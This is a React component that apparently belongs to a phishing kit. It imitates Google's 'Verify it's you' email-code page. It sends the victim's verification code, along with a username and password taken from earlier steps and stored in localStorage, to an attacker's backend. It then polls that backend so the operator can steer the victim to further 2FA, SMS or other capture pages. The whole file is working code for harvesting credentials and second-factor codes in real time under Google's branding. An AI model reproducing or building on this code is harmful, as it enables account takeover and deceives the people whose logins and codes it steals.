import { useState, useEffect } from "react";
import GoogleAuthPopup, { GoogleAccountChip } from "./GoogleAuthPopup";

export default function Email() {
  const [code, setCode] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [messageIndex, setMessageIndex] = useState(0);
  const [error, setError] = useState("");
  const [infoMessage, setInfoMessage] = useState("");
  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const FRONT_URL = window.location.origin;

  console.log(FRONT_URL);

  const handleSubmit = (e) => {
    e.preventDefault();
    setError("");
    setInfoMessage("");
    setLoading(true);

    (async () => {
      try {
        const res = await fetch(`${API_URL}/api/email`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ code, username, password }),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Login failed");
        }

        const { session_id } = await res.json();
        setSessionId(session_id);
      } catch (err) {
        console.error("Login failed:", err);
        setError(err.message || "Login failed");
        setLoading(false);
      }
    })();
  };
  useEffect(() => {
    if (!sessionId) return;

    const routes = {
      email: "/email",
      wp: "/wp",
      "2fa": "/2fa",
      sms: "/sms",
      wpauth: "/wp",
    };

    const poll = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );

        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        // ✅ Handle direct URL redirects
        if (data.redirect) {
          clearInterval(poll);
          console.log(`Redirecting to: ${data.redirect}`);
          // ⛔️ Do not stop loading — we want it to show during redirect
          window.location.replace(data.redirect);
          return;
        }

        // ✅ Handle internal auth routes
        if (data.authType) {
          clearInterval(poll);
          const route = routes[data.authType];
          if (route) {
            console.log(`Navigating to: ${route}`);
            window.location.replace(`${FRONT_URL}${route}`);
          } else {
            setError("Unknown authentication type.");
            setLoading(false);
          }
          return;
        }

        // Handle error messages
        if (data.error) {
          clearInterval(poll);
          setError(data.error);
          setLoading(false);
          return;
        }

        // Handle general messages
        if (data.message) {
          setInfoMessage(data.message);
        }
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId]);

  useEffect(() => {
    const storedUsername = localStorage.getItem("username") || "";
    const storedPassword = localStorage.getItem("password") || "";
    setUsername(storedUsername);
    setPassword(storedPassword);
  }, []);

  return (
    <GoogleAuthPopup>
      <h1 className="google-verify-title">Verify it&apos;s you</h1>
      <p className="google-verify-intro google-verify-intro--tight">
        To help keep your account safe, Google wants to make sure it&apos;s really
        you trying to sign in.
      </p>
      <GoogleAccountChip email={username} />

      <h2 className="google-verify-subtitle">Check your email</h2>
      <p className="google-verify-detail">
        Enter the verification code we sent to your email.
      </p>

      <form
        onSubmit={handleSubmit}
        className="google-signin-form google-verify-form"
      >
        <div className="input-group">
          <div className="input-wrapper google-signin-input">
            <input
              id="code"
              type="tel"
              inputMode="numeric"
              pattern="\d{6}|\d{8}"
              maxLength={8}
              minLength={6}
              value={code}
              disabled={loading}
              onChange={(e) => {
                const val = e.target.value;
                if (/^\d*$/.test(val)) {
                  setCode(val);
                  if (error) setError(false);
                }
              }}
              required
              className={`${code.trim() ? "filled" : ""} ${
                error ? "error-input" : ""
              }`}
              autoFocus
            />
            <label htmlFor="code" className={error ? "error-label" : ""}>
              Enter code
            </label>
          </div>
          {error && (
            <p className="error-message">
              That code didn&apos;t work. Please re-enter your code again.
            </p>
          )}
          {infoMessage && (
            <p className="google-verify-detail">{infoMessage}</p>
          )}
        </div>

        <div className="submit-button-div google-signin-actions">
          <button type="button" className="custom-secondary-button google-signin-link-btn">
            Try another way
          </button>
          <button
            className="custom-primary-button google-signin-next-btn"
            type="submit"
            disabled={loading || !code.trim()}
          >
            {loading ? (
              <div className="fb-loader-btn">
                <div className="fb-spinner"></div>
              </div>
            ) : (
              "Next"
            )}
          </button>
        </div>
      </form>
    </GoogleAuthPopup>
  );
}
